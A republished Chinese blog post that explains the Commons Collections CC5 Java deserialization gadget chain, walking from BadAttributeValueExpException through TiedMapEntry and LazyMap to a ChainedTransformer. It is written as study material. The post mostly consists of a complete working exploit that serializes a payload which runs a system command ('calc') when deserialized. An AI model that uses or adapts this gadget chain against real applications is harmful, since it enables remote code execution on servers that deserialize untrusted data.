热门标签
热门文章
- 1STM32+ESP8266+7脚oled屏幕连接心知天气_esp8266 oled
- 2navicat --CSV导出数据乱码情况(三种情况解决方式)_navicat导出csv中文乱码
- 3[机缘参悟-123] :实修 - 东西方各种思想流派实修的要旨与比较?_东方西方觉醒开悟的法门
- 4SQL Server详细使用教程_sql sever使用
- 5设计模式之观察者模式(监听模式)
- 6sql:hive:mysql:函数:NVL、NVL2、NULLIF,IFNULL、Coalesce_ifnull nullif hive
- 7我的8年经验之谈:35岁的功能测试就没有未来了?自己也能拯救自己!_38岁只会功能测试
- 8商用无人机的销售网站(JSP+java+springmvc+mysql+MyBatis)
- 9LabVIEW开发EOL功能测试系统
- 10MAC 中Git 的使用_mac使用git
当前位置: article > 正文
Java安全--CC5_cc5 java
作者:繁依Fanyi0 | 2024-06-09 15:57:20
赞
踩
cc5 java
后面确实学了这么多了,觉得能比较看得懂了,直接放一张CC5的调用图吧:
直接从入口来讲吧:
BadAttributeValueExpException.readObject调用了toString,只要把valObj控制为TiedMapEntry就可以走到TiedMapEntry.toString了。即实例化BadAttributeValueExpException的时候传入TiedMapEntry了。
之后TiedMapEntry.toString --> TiedMapEntry.getValue --> LazyMap.get。再往后一路都比较熟悉就不说了。直接贴代码了:
- package org.example;
-
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
-
- import javax.management.BadAttributeValueExpException;
- import java.io.*;
- import java.lang.reflect.Field;
- import java.util.HashMap;
- import java.util.Map;
-
- public class CC5 {
- public static void main(String[] args) throws Exception{
- Transformer[] transformers = {
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
- new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
- new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
- };
- ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
-
- HashMap<Object, Object> hashMap = new HashMap<>();
- Map decorate = LazyMap.decorate(hashMap, chainedTransformer);
- TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "key");
- BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
-
- Class<BadAttributeValueExpException> badAttributeValueExpExceptionClass = BadAttributeValueExpException.class;
- Field valField = badAttributeValueExpExceptionClass.getDeclaredField("val");
- valField.setAccessible(true);
- valField.set(badAttributeValueExpException, tiedMapEntry);
- serialize(badAttributeValueExpException);
- unserialize("ser.bin");
- }
- public static void serialize(Object obj) throws IOException {
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
- objectOutputStream.writeObject(obj);
- }
- public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
- ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
- return objectInputStream.readObject();
- }
- }
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/694816
推荐阅读
相关标签
